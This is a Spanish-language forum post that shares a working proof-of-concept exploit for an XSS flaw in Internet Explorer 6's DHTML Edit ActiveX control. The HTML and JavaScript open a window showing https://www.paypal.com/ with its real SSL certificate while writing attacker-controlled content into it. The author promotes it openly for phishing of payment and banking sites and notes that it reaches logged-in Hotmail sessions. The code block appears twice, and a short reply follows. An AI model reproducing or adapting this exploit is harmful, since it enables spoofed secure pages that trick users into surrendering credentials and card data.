Autor
Voy a cambiar de tercio esta vez, no vaya a ser que me encasilleis en criptografía
.Hace unos días ví que apareció una vulnerabilidad XSS en el ActiveX DHTML Edit Control del IE6.0, y que tiene unas posibilidades increíbles, sobre todo para ataques tipo "phising".
Un atacante podría simular una web segura, de cualquier sistema de pago o entidad bancaria por ejemplo, manteniendo la URL del sistema falsificado, su certificado de servidor, e incluso su tráfico de cookies.
Os pego un programilla para que jugueis. Solo teneis que guardarlo como html.
Espero que os guste.
Salu2.
Código:
<html>
<head>
</head>
<body>
<center>
<b>Vulnerabilidad XSS IE6.0 para phising SSL</b><br>
<br>
Pincha en el link de abajo para comprobar si tu sistema es vulnerable. este test abrirá una ventana nueva, con la URL "https://www.paypal.com/", pero mostrando el contenido de este HTML.<br>
<br>
<b>Test de vulnerabilidad</b><br>
<a href="javascript:start();"><font color="#000000">Haz clink en este link</font></a><br>
<br>
</center>
<!-- Esto evidentemente no tendrá ningún efecto si no está activadas las secuencias de comandos ActiveX en nuestro navegador -->
<!-- DHTML Edit Control -->
<object id="edtcon" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0">
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
<script>
function trigger()
{
window.name = "poorchild";
open("https://www.paypal.com/", "poorchild");
/*
Incluso las cookies son transferidas a través del Dhtml Edit control. Esto implica entre otras cosas, que por ejemplo
http://by22fd.bay22.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001
funcionará correctamente, siempre que el usuario ya esté logado, por supuesto.
Je, je, el sueño de los lammers caza hotmails.
Nota: No voy a desarrollar nada del script para robo de cookies ni esas cosas por razones obvias. Esto solo hace phising.
*/
}
function payload()
{
url = "https://www.paypal.com/";
s = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">' +
'<HTML>' +
'<HEAD>' +
'<TITLE> Internet Explorer Cross Site Scripting </TITLE>' +
'</HEAD>' +
'<BODY bgcolor="#FFFFFF">' +
'<center>' +
'<table width="80%" cellspacing="0" cellpadding="0">' +
'<tr>' +
'<td height="20" align="center">Internet Explorer Cross Site Scripting en SSL</td>' +
'</tr>' +
'<tr><td><br></td></tr>' +
'<tr>' +
'<td>El contenido que estas visualizando es el de este HTML, aunque en el <b>Address Bar</b> nos indica que estamos en: <b>https://www.paypal.com/</b><br>' +
'<br>' +
'Puedes hacer click en el icono del candado SSL, para comprobar como el certificado del servidor claramente nos asegura que estamos en: <b>https://www.paypal.com/</b><br>' +
'<br>' +
'Esta página podría fácilmente programarse para robar información de las cookies (usernames, passwords, session IDs, etc.), o para engañar al usuario solicitándole información privada (tarjetas de crédito, etc), o para hacerle instalarse un programa, o lo que se nos ocurra ;).<br>' +
'<br>' +
'Esta vulnerabilidad también permite al atacante ejecutar scripts arbitrarios, etc. Las posibilidades sólo las limita la imaginación.<br>' +
'<br>' +
'<br>' +
'<center><a href="javascript:window.close();">Cerrar esta ventana</a></center></td>' +
'</tr>' +
'<tr><td><br></td></tr>' +
'<tr>' +
'<td height="20" align="center"> Internet Explorer Cross Site Scripting con SSL</td>' +
'</table>' +
'</center>' +
'</BODY>' +
'</HTML>';
w = open(url, "paypal");
w.document.write(s);
}
function start()
{
edtcon.DOM.Script.execScript(trigger.toString());
edtcon.DOM.Script.setTimeout("trigger()");
poll();
}
function poll() {
try {
edtcon.DOM.location.href;
setTimeout('poll()', 100);
}
catch (e) {
edtcon.DOM.Script.execScript(payload.toString());
edtcon.DOM.Script.setTimeout("payload()");
}
}
</script>
</body>
</html>
<head>
</head>
<body>
<center>
<b>Vulnerabilidad XSS IE6.0 para phising SSL</b><br>
<br>
Pincha en el link de abajo para comprobar si tu sistema es vulnerable. este test abrirá una ventana nueva, con la URL "https://www.paypal.com/", pero mostrando el contenido de este HTML.<br>
<br>
<b>Test de vulnerabilidad</b><br>
<a href="javascript:start();"><font color="#000000">Haz clink en este link</font></a><br>
<br>
</center>
<!-- Esto evidentemente no tendrá ningún efecto si no está activadas las secuencias de comandos ActiveX en nuestro navegador -->
<!-- DHTML Edit Control -->
<object id="edtcon" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0">
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
<script>
function trigger()
{
window.name = "poorchild";
open("https://www.paypal.com/", "poorchild");
/*
Incluso las cookies son transferidas a través del Dhtml Edit control. Esto implica entre otras cosas, que por ejemplo
http://by22fd.bay22.hotmail.msn.com/cgi-bin/HoTMaiL?curmbox=F000000001
funcionará correctamente, siempre que el usuario ya esté logado, por supuesto.
Je, je, el sueño de los lammers caza hotmails.
Nota: No voy a desarrollar nada del script para robo de cookies ni esas cosas por razones obvias. Esto solo hace phising.
*/
}
function payload()
{
url = "https://www.paypal.com/";
s = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">' +
'<HTML>' +
'<HEAD>' +
'<TITLE> Internet Explorer Cross Site Scripting </TITLE>' +
'</HEAD>' +
'<BODY bgcolor="#FFFFFF">' +
'<center>' +
'<table width="80%" cellspacing="0" cellpadding="0">' +
'<tr>' +
'<td height="20" align="center">Internet Explorer Cross Site Scripting en SSL</td>' +
'</tr>' +
'<tr><td><br></td></tr>' +
'<tr>' +
'<td>El contenido que estas visualizando es el de este HTML, aunque en el <b>Address Bar</b> nos indica que estamos en: <b>https://www.paypal.com/</b><br>' +
'<br>' +
'Puedes hacer click en el icono del candado SSL, para comprobar como el certificado del servidor claramente nos asegura que estamos en: <b>https://www.paypal.com/</b><br>' +
'<br>' +
'Esta página podría fácilmente programarse para robar información de las cookies (usernames, passwords, session IDs, etc.), o para engañar al usuario solicitándole información privada (tarjetas de crédito, etc), o para hacerle instalarse un programa, o lo que se nos ocurra ;).<br>' +
'<br>' +
'Esta vulnerabilidad también permite al atacante ejecutar scripts arbitrarios, etc. Las posibilidades sólo las limita la imaginación.<br>' +
'<br>' +
'<br>' +
'<center><a href="javascript:window.close();">Cerrar esta ventana</a></center></td>' +
'</tr>' +
'<tr><td><br></td></tr>' +
'<tr>' +
'<td height="20" align="center"> Internet Explorer Cross Site Scripting con SSL</td>' +
'</table>' +
'</center>' +
'</BODY>' +
'</HTML>';
w = open(url, "paypal");
w.document.write(s);
}
function start()
{
edtcon.DOM.Script.execScript(trigger.toString());
edtcon.DOM.Script.setTimeout("trigger()");
poll();
}
function poll() {
try {
edtcon.DOM.location.href;
setTimeout('poll()', 100);
}
catch (e) {
edtcon.DOM.Script.execScript(payload.toString());
edtcon.DOM.Script.setTimeout("payload()");
}
}
</script>
</body>
</html>
En línea
.
sera que no soy vulnerable? 
